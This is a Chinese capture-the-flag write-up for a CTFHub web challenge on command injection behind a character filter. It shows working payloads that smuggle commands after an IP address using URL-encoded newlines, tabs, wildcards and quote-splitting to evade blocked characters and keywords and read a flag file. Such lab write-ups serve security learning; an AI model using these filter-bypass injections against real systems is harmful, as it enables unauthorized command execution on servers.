CTFHUB-web-RCE-综合过滤练习

开启题目

查看网页源代码发现这次网页对 | 、 && 、 || 、 \ 、 / 、; ,都进行了过滤处理

发现换行符 %0a 和回车符 %0d 可以进行测试,在 URL 后面拼接访问

复制代码
127.0.0.1%0als

用 ls flag_is_here 查看 flag 文件中的内容,发现回显为空,发现网页源代码中还过滤了几个字符,分别是 cat 、 flag 、 ctfhub ,这里尝试使用 %09 ( URL 编码中 表示 Tab 制表符)加上通配符进行绕过

复制代码
127.0.0.1%0als%09*here
复制代码
127.0.0.1%0acd%09*here%0ac%27a%27t%09*_31687958414358.php
相关推荐
Safeploy安策数据2 小时前
国密合规怎么落地?从密钥管理到内网安全完整流程
大数据·安全
通问AI2 小时前
【实战参考】Claude Fable 5.1 发布:长时运行 Agent 的选型评估与安全护栏要点
安全
砚凝霜2 小时前
【软考信息安全】第二章 网络攻击基础与常见技术方法
网络·安全·php
2401_868534782 小时前
安全管理策略和制度
网络·安全
Lust Dusk3 小时前
【最新】VMware虚拟机下载安装教程
网络·网络安全·系统安全
布莱克6053 小时前
strcpy 函数详解:作用、用法与安全缺陷
c语言·开发语言·c++·安全
STQY燊桐启元(深圳)电子科技4 小时前
太阳能追踪设备散热优化,相变陶瓷片解决全日照高温积温故障
经验分享·笔记·pcm
luiyarch4 小时前
汽车电子ISO 26262功能安全系列(第29期):软件集成测试与嵌入式软件验证——把“零件”拼成“整机”
安全·汽车·集成测试
虹科数字化与AR4 小时前
如何整合BIM、IoT与实时数据构建数字孪生?
经验分享
山东科恩光电4 小时前
提升工业安全的保护利器:全面解析安全地毯的功能与优势
安全